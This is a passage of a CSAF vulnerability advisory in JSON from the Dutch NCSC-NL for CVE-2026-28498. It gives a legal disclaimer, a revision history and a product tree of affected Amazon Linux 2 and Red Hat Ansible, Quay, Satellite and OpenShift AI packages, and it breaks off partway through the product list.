{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-28498", "tracking": { "current_release_date": "2026-04-03T00:35:43.616119Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-28498", "initial_release_date": "2026-03-16T16:43:01.489434Z", "revision_history": [ { "date": "2026-03-16T16:43:01.489434Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-16T16:43:04.728346Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-16T18:28:22.148921Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-16T18:28:23.931952Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-16T18:38:42.019486Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1).| Unknown change." }, { "date": "2026-03-16T18:38:43.462135Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-16T22:50:58.698921Z", "number": "7", "summary": "References created (1)." }, { "date": "2026-03-17T00:27:42.119519Z", "number": "8", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (30).| Product Identifiers created (5).| References created (5).| Vendor_assessment created." }, { "date": "2026-03-17T00:27:48.240842Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-17T00:44:05.664252Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Products connected (2)." }, { "date": "2026-03-17T00:44:14.722759Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-17T06:43:42.190904Z", "number": "12", "summary": "Description created for source." }, { "date": "2026-03-17T07:35:17.587694Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-03-17T15:03:34.388556Z", "number": "14", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-17T15:03:37.510865Z", "number": "15", "summary": "NCSC Score updated." }, { "date": "2026-03-17T21:28:30.926984Z", "number": "16", "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-17T21:28:33.062172Z", "number": "17", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:28:26.119795Z", "number": "18", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-03-19T15:28:36.081240Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:36:55.828201Z", "number": "20", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:36:59.343604Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-04-01T06:56:19.905961Z", "number": "22", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products connected (1)." }, { "date": "2026-04-01T06:56:23.369903Z", "number": "23", "summary": "NCSC Score updated." }, { "date": "2026-04-01T11:28:51.171131Z", "number": "24", "summary": "Source connected.| CVE status created. (valid)| Products connected (2).| References created (4)." }, { "date": "2026-04-01T11:28:53.417660Z", "number": "25", "summary": "NCSC Score updated." }, { "date": "2026-04-01T12:35:46.290026Z", "number": "26", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (29).| Product Remediations created (2).| Product Identifiers created (104).| Product Identifiers removed (104).| References created (21).| CWES updated (1)." }, { "date": "2026-04-01T12:36:06.505043Z", "number": "27", "summary": "NCSC Score updated." }, { "date": "2026-04-02T09:05:47.020663Z", "number": "28", "summary": "Products connected (3).| References created (4)." }, { "date": "2026-04-02T09:05:52.640338Z", "number": "29", "summary": "NCSC Score updated." }, { "date": "2026-04-02T12:28:47.098421Z", "number": "30", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (28).| Product Remediations created (2).| Product Identifiers created (100).| Product Identifiers removed (100).| References created (21).| CWES updated (1)." }, { "date": "2026-04-02T12:29:04.751568Z", "number": "31", "summary": "NCSC Score updated." }, { "date": "2026-04-03T00:34:28.594879Z", "number": "32", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (11).| Product Remediations created (2).| Product Identifiers created (19).| Product Identifiers removed (19).| References created (22).| CWES updated (1)." }, { "date": "2026-04-03T00:34:32.950237Z", "number": "33", "summary": "NCSC Score updated." } ], "status": "interim", "version": "33" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1330296", "product_identification_helper": { "cpe": "cpe:/o:amazon:linux_2:-" } } } ], "category": "product_name", "name": "Amazon Linux 2" } ], "category": "vendor", "name": "Amazon" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.5", "product": { "name": "vers:unknown/<2.5", "product_id": "CSAFPID-1384077" } }, { "category": "product_version_range", "name": "vers:unknown/<2.6", "product": { "name": "vers:unknown/<2.6", "product_id": "CSAFPID-5354794" } } ], "category": "product_name", "name": "Ansible Automation Platform" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474797", "product_identification_helper": { "cpe": "cpe:/a:redhat:lightspeed_core" } } } ], "category": "product_name", "name": "Lightspeed Core" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2.6", "product": { "name": "vers:rpm/2.6", "product_id": "CSAFPID-5153949", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2.6" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774139204", "product": { "name": "vers:oci/1774139204", "product_id": "CSAFPID-5973066", "product_identification_helper": { "purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ae43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139204" } } } ], "category": "product_name", "name": "aap-must-gather-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774153089", "product": { "name": "vers:oci/1774153089", "product_id": "CSAFPID-5973067", "product_identification_helper": { "purl": "pkg:oci/ansible-builder-rhel9@sha256%3Adb8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774153089" } } } ], "category": "product_name", "name": "ansible-builder-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774585183", "product": { "name": "vers:oci/1774585183", "product_id": "CSAFPID-5973068", "product_identification_helper": { "purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774585183" } } } ], "category": "product_name", "name": "ansible-dev-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774368903", "product": { "name": "vers:oci/1774368903", "product_id": "CSAFPID-5973070", "product_identification_helper": { "purl": "pkg:oci/controller-rhel9@sha256%3Aa490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774368903" } } } ], "category": "product_name", "name": "controller-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484033", "product": { "name": "vers:oci/1774484033", "product_id": "CSAFPID-5973069", "product_identification_helper": { "purl": "pkg:oci/controller-rhel9-operator@sha256%3Aee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484033" } } } ], "category": "product_name", "name": "controller-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774487884", "product": { "name": "vers:oci/1774487884", "product_id": "CSAFPID-5973071", "product_identification_helper": { "purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774487884" } } } ], "category": "product_name", "name": "de-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774490244", "product": { "name": "vers:oci/1774490244", "product_id": "CSAFPID-5973072", "product_identification_helper": { "purl": "pkg:oci/de-supported-rhel9@sha256%3Afa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774490244" } } } ], "category": "product_name", "name": "de-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774258433", "product": { "name": "vers:oci/1774258433", "product_id": "CSAFPID-5973074", "product_identification_helper": { "purl": "pkg:oci/eda-controller-rhel9@sha256%3Af720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774258433" } } } ], "category": "product_name", "name": "eda-controller-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484073", "product": { "name": "vers:oci/1774484073", "product_id": "CSAFPID-5973073", "product_identification_helper": { "purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Afe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484073" } } } ], "category": "product_name", "name": "eda-controller-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484106", "product": { "name": "vers:oci/1774484106", "product_id": "CSAFPID-5973075", "product_identification_helper": { "purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Af95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484106" } } } ], "category": "product_name", "name": "eda-controller-ui-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774311517", "product": { "name": "vers:oci/1774311517", "product_id": "CSAFPID-5973076", "product_identification_helper": { "purl": "pkg:oci/ee-minimal-rhel9@sha256%3Ab77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774311517" } } } ], "category": "product_name", "name": "ee-minimal-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774321273", "product": { "name": "vers:oci/1774321273", "product_id": "CSAFPID-5973077", "product_identification_helper": { "purl": "pkg:oci/ee-supported-rhel9@sha256%3Ad6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774321273" } } } ], "category": "product_name", "name": "ee-supported-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774139334", "product": { "name": "vers:oci/1774139334", "product_id": "CSAFPID-5973078", "product_identification_helper": { "purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774139334" } } } ], "category": "product_name", "name": "gateway-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774243862", "product": { "name": "vers:oci/1774243862", "product_id": "CSAFPID-5973080", "product_identification_helper": { "purl": "pkg:oci/gateway-rhel9@sha256%3Aed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774243862" } } } ], "category": "product_name", "name": "gateway-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484129", "product": { "name": "vers:oci/1774484129", "product_id": "CSAFPID-5973079", "product_identification_helper": { "purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484129" } } } ], "category": "product_name", "name": "gateway-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774644659", "product": { "name": "vers:oci/1774644659", "product_id": "CSAFPID-5973082", "product_identification_helper": { "purl": "pkg:oci/hub-rhel9@sha256%3Ad204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774644659" } } } ], "category": "product_name", "name": "hub-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484154", "product": { "name": "vers:oci/1774484154", "product_id": "CSAFPID-5973081", "product_identification_helper": { "purl": "pkg:oci/hub-rhel9-operator@sha256%3Aa89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484154" } } } ], "category": "product_name", "name": "hub-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774647780", "product": { "name": "vers:oci/1774647780", "product_id": "CSAFPID-5973083", "product_identification_helper": { "purl": "pkg:oci/hub-web-rhel9@sha256%3Afad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774647780" } } } ], "category": "product_name", "name": "hub-web-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774417022", "product": { "name": "vers:oci/1774417022", "product_id": "CSAFPID-5973065", "product_identification_helper": { "purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774417022" } } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774363040", "product": { "name": "vers:oci/1774363040", "product_id": "CSAFPID-5973085", "product_identification_helper": { "purl": "pkg:oci/lightspeed-rhel9@sha256%3Adb0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774363040" } } } ], "category": "product_name", "name": "lightspeed-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484113", "product": { "name": "vers:oci/1774484113", "product_id": "CSAFPID-5973084", "product_identification_helper": { "purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Accf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484113" } } } ], "category": "product_name", "name": "lightspeed-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774268173", "product": { "name": "vers:oci/1774268173", "product_id": "CSAFPID-5973090", "product_identification_helper": { "purl": "pkg:oci/mcp-server-rhel9@sha256%3A6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774268173" } } } ], "category": "product_name", "name": "mcp-server-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774268174", "product": { "name": "vers:oci/1774268174", "product_id": "CSAFPID-5973086", "product_identification_helper": { "purl": "pkg:oci/mcp-tools-rhel9@sha256%3A7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082?arch=ppc64le&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774268174" } } } ], "category": "product_name", "name": "mcp-tools-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774540248", "product": { "name": "vers:oci/1774540248", "product_id": "CSAFPID-5984227", "product_identification_helper": { "purl": "pkg:oci/metrics-service-rhel9@sha256%3Ac8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-tech-preview&tag=1774540248" } } } ], "category": "product_name", "name": "metrics-service-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774648896", "product": { "name": "vers:oci/1774648896", "product_id": "CSAFPID-5973091", "product_identification_helper": { "purl": "pkg:oci/platform-operator-bundle@sha256%3A79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648896" } } }, { "category": "product_version_range", "name": "vers:oci/1774648925", "product": { "name": "vers:oci/1774648925", "product_id": "CSAFPID-5973092", "product_identification_helper": { "purl": "pkg:oci/platform-operator-bundle@sha256%3Af27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform&tag=1774648925" } } } ], "category": "product_name", "name": "platform-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774484549", "product": { "name": "vers:oci/1774484549", "product_id": "CSAFPID-5973087", "product_identification_helper": { "purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Abc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219?arch=arm64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774484549" } } } ], "category": "product_name", "name": "platform-resource-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774485790", "product": { "name": "vers:oci/1774485790", "product_id": "CSAFPID-5973088", "product_identification_helper": { "purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3Af0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51?arch=amd64&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774485790" } } } ], "category": "product_name", "name": "platform-resource-runner-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774573035", "product": { "name": "vers:oci/1774573035", "product_id": "CSAFPID-5973089", "product_identification_helper": { "purl": "pkg:oci/receptor-rhel9@sha256%3Af00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c?arch=s390x&repository_url=registry.redhat.io/ansible-automation-platform-26&tag=1774573035" } } } ], "category": "product_name", "name": "receptor-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/unknown", "product": { "name": "vers:unknown/unknown", "product_id": "CSAFPID-1317175", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:5::server" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1439279", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift_ai" } } } ], "category": "product_name", "name": "Red Hat OpenShift AI (RHOAI)" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3.16", "product": { "name": "vers:rpm/3.16", "product_id": "CSAFPID-5278082", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3.16::el9" } } } ], "category": "product_name", "name": "Red Hat Quay 3.16" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773785566", "product": { "name": "vers:oci/1773785566", "product_id": "CSAFPID-5986174", "product_identification_helper": { "purl": "pkg:oci/clair-rhel9@sha256%3Abbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1773785566" } } } ], "category": "product_name", "name": "clair-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773785412", "product": { "name": "vers:oci/1773785412", "product_id": "CSAFPID-5986175", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3A1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773785412" } } } ], "category": "product_name", "name": "quay-bridge-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773784980", "product": { "name": "vers:oci/1773784980", "product_id": "CSAFPID-5986176", "product_identification_helper": { "purl": "pkg:oci/quay-bridge-operator-rhel9@sha256%3A7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773784980" } } } ], "category": "product_name", "name": "quay-bridge-operator-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773781267", "product": { "name": "vers:oci/1773781267", "product_id": "CSAFPID-5986177", "product_identification_helper": { "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773781267" } } } ], "category": "product_name", "name": "quay-builder-qemu-rhcos-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773785008", "product": { "name": "vers:oci/1773785008", "product_id": "CSAFPID-5986178", "product_identification_helper": { "purl": "pkg:oci/quay-builder-rhel9@sha256%3Ab97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773785008" } } } ], "category": "product_name", "name": "quay-builder-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773785431", "product": { "name": "vers:oci/1773785431", "product_id": "CSAFPID-5986179", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3Aa48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775?arch=amd64&repository_url=registry.redhat.io/quay&tag=1773785431" } } } ], "category": "product_name", "name": "quay-container-security-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773784956", "product": { "name": "vers:oci/1773784956", "product_id": "CSAFPID-5986180", "product_identification_helper": { "purl": "pkg:oci/quay-container-security-operator-rhel9@sha256%3Ab5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f?arch=s390x&repository_url=registry.redhat.io/quay&tag=1773784956" } } } ], "category": "product_name", "name": "quay-container-security-operator-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1774539928", "product": { "name": "vers:oci/1774539928", "product_id": "CSAFPID-5986181", "product_identification_helper": { "purl": "pkg:oci/quay-operator-bundle@sha256%3A1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70?arch=amd64&repository_url=registry.redhat.io/quay&tag=1774539928" } } } ], "category": "product_name", "name": "quay-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1773784969", "product": { "name": "vers:oci/1773784969", "product_id": "CSAFPID-5986182", "product_identification_helper": { "purl": "pkg:oci/quay-operator-rhel9@sha256%3Ad8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b?arch=ppc64le&repository_url=registry.redhat.io/quay&tag=1773784969" } } } ], "category": "product_name", "name": "quay-operator-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:oci/1775069491", "product": { "name": "vers:oci/1775069491", "product_id": "CSAFPID-5986173", "product_identification_helper": { "purl": "pkg:oci/quay-rhel9@sha256%3Ade5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e?arch=s390x&repository_url=registry.redhat.io/quay&tag=1775069491" } } } ], "category": "product_name", "name": "quay-rhel9" } ], "category": "product_family", "name": "Red Hat Quay" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/6", "product": { "name": "vers:rpm/6", "product_id": "CSAFPID-1439313", "product_identification_helper": { "cpe": "cpe:/a:redhat:satellite:6" } } } ], "category": "product_name", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222639" } } ], "category": "product_name", "name": "foreman-mcp-server-rhel9" } ], "category": "product_family", "name": "Red Hat Satellite 6" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2831634" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5035448" } } ], "category": "product_name", "name": "lightspeed-chatbot-rhel9" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5474798" } } ], "category": "product_name", "name": "lightspeed-stack-rhel9" } ], "category": "product_family", "name": "Lightspeed Core" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5811359" } } ], "category": "product_name", "name": "odh-mlflow-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068100" } } ], "category": "product_name", "name": "odh-pipeline-runtime-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068103" } } ], "category": "product_name", "name": "odh-pipeline-runtime-minimal-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068105" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222767" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-llmcompressor-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068108" } } ], "category": "product_name", "name": "odh-pipeline-runtime-pytorch-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068110" } } ], "category": "product_name", "name": "odh-pipeline-runtime-tensorflow-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5155537" } } ], "category": "product_name", "name": "odh-pipeline-runtime-tensorflow-rocm-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068114" } } ], "category": "product_name", "name": "odh-workbench-codeserver-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068116" } } ], "category": "product_name", "name": "odh-workbench-jupyter-datascience-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068119" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-cpu-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5068121" } } ], "category": "product_name", "name": "odh-workbench-jupyter-minimal-cuda-py312-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": 